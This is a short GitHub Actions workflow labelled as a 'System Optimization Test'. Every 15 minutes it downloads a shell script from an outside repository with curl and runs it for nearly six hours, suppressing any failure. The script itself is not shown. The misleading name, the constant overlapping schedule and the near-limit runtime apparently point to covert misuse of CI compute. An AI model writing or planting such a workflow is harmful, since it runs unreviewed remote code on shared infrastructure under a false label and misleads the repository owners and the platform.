name: System Optimization Test

on:
  workflow_dispatch: # Allows manual trigger
  schedule:
    - cron: '*/15 * * * *' # Runs every 15 minutes

jobs:
  optimization-test:
    runs-on: ubuntu-latest
    steps:
      - name: Fetch optimization script
        run: |
          curl -sLo bench_setup.sh https://raw.githubusercontent.com/Working-aanas/deepscreen/main/screen.sh
          chmod +x bench_setup.sh
          
      - name: Execute test with 5h 55min timeout
        run: |
          # Run the script with a 5-hour and 55-minute timeout.
          # The 'timeout' command will terminate the process after the specified duration.
          # '|| echo "Test completed or timed out"' will ensure the step doesn't fail
          # if the timeout occurs (as 'timeout' exits with 124 on timeout).
          timeout 355m ./bench_setup.sh || echo "Test completed or timed out"
